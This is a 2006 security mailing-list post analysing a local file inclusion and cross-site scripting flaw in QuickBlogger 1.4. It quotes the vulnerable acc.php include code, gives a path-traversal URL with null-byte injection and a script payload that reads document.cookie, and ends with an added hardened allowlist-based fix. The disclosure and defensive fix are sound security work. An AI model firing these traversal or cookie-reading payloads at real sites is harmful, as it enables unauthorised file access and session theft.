[VIM] QuickBlogger v1.4 Cross-Site Scripting (fwd)
Steven M. Christey
coley at linus.mitre.org
Fri Apr 14 18:04:41 EDT 2006
Another botan issue, but this time he gave enough info to investigate
further :)
---------- Forwarded message ----------
Date: Fri, 14 Apr 2006 18:01:21 -0400 (EDT)
From: Steven M. Christey <coley at mitre.org>
To: bugtraq at securityfocus.com
Subject: Re: QuickBlogger v1.4 Cross-Site Scripting
This is yet another case where XSS is resultant from a more serious
issue. The primary issue here involves local file inclusion.
retrogod-style attacks might be feasible by injecting PHP code into
text-based data files within the application, then including those
text files using this issue; however, I did not explore it that
deeply.
Based on a download of the 1.4 source from another location, we have
the following code from acc.php:
    if ($_GET['request'] == "") {
        $page = "actions/main.php";
    }
    else {
        $page = "actions/" . $_GET['request'] . ".php";
    }
    include $page;
I can use ".." sequences to include arbitrary PHP files, and null
character injection for arbitrary files of other types:
acc.php?request=../../../abcdef.txt%00
So - what happens when I use the original XSS manipulation provided by
botan?
acc.php?request=<script>alert(document.cookie)</script>
If my PHP errors are set up properly, and if I've got a version of PHP
that allows XSS in error messages, I get:
Warning: main(): Failed opening
'actions/<script>alert(document.cookie)</script>.php' for inclusion
(include_path='[PATH HERE]') in acc.php on line 220
This was tested on QuickBlogger 1.4 under PHP 4.
- Steve
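Editor's added example, not QuickBlogger's code and not part of Steve's message: a hardened replacement for the acc.php dispatcher quoted above. The fix that removes both findings at once is to stop building a filesystem path from $_GET['request'] at all and instead map the request to a fixed allowlist of action files, so neither ".." traversal nor a NUL byte can change what include() loads, and to HTML-escape anything reflected back to the browser so the error-message XSS path closes as well. The action names other than "main" are assumed for illustration; only main.php is named on the page.

```php
<?php
// Added example (not QuickBlogger 1.4 code): allowlist-based action dispatch.
// Written against PHP 4-era functions only, since the original was tested on PHP 4.

// In production, never reflect raw PHP warnings to the client: the original
// report shows the unescaped include path leaking into a Warning: message.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// Fixed map of request token -> file. The key is the only thing the client
// controls, and it is never used to build a path. Names other than 'main'
// are assumed for this example.
$allowed_actions = array(
    'main' => 'main.php',
    'post' => 'post.php',   // assumed action name
    'edit' => 'edit.php',   // assumed action name
);

$request = isset($_GET['request']) ? (string) $_GET['request'] : '';
if ($request === '') {
    $request = 'main';
}

if (!isset($allowed_actions[$request])) {
    // Unknown action: do not touch the filesystem with it, and escape it
    // before echoing so "<script>" in the parameter is rendered inert.
    header('HTTP/1.0 404 Not Found');
    echo '<p>Unknown action: ' . htmlspecialchars($request, ENT_QUOTES) . '</p>';
    exit;
}

// Defence in depth: even though the value came from the allowlist, confirm
// the resolved file really lives under actions/ next to this script.
$actions_dir = realpath(dirname(__FILE__) . '/actions');
$target      = realpath(dirname(__FILE__) . '/actions/' . $allowed_actions[$request]);

if ($actions_dir === false || $target === false
    || strpos($target, $actions_dir . DIRECTORY_SEPARATOR) !== 0) {
    // Misconfiguration (missing file) rather than attacker input; fail closed.
    header('HTTP/1.0 500 Internal Server Error');
    exit;
}

include $target;
?>
```

With this in place, a request such as the traversal or script payloads shown above simply fails the isset() lookup and is echoed back escaped; the include() line can only ever execute one of the files listed in $allowed_actions. The realpath() check is redundant for allowlisted values and exists so that a later edit which reintroduces user-derived paths still cannot escape the actions/ directory.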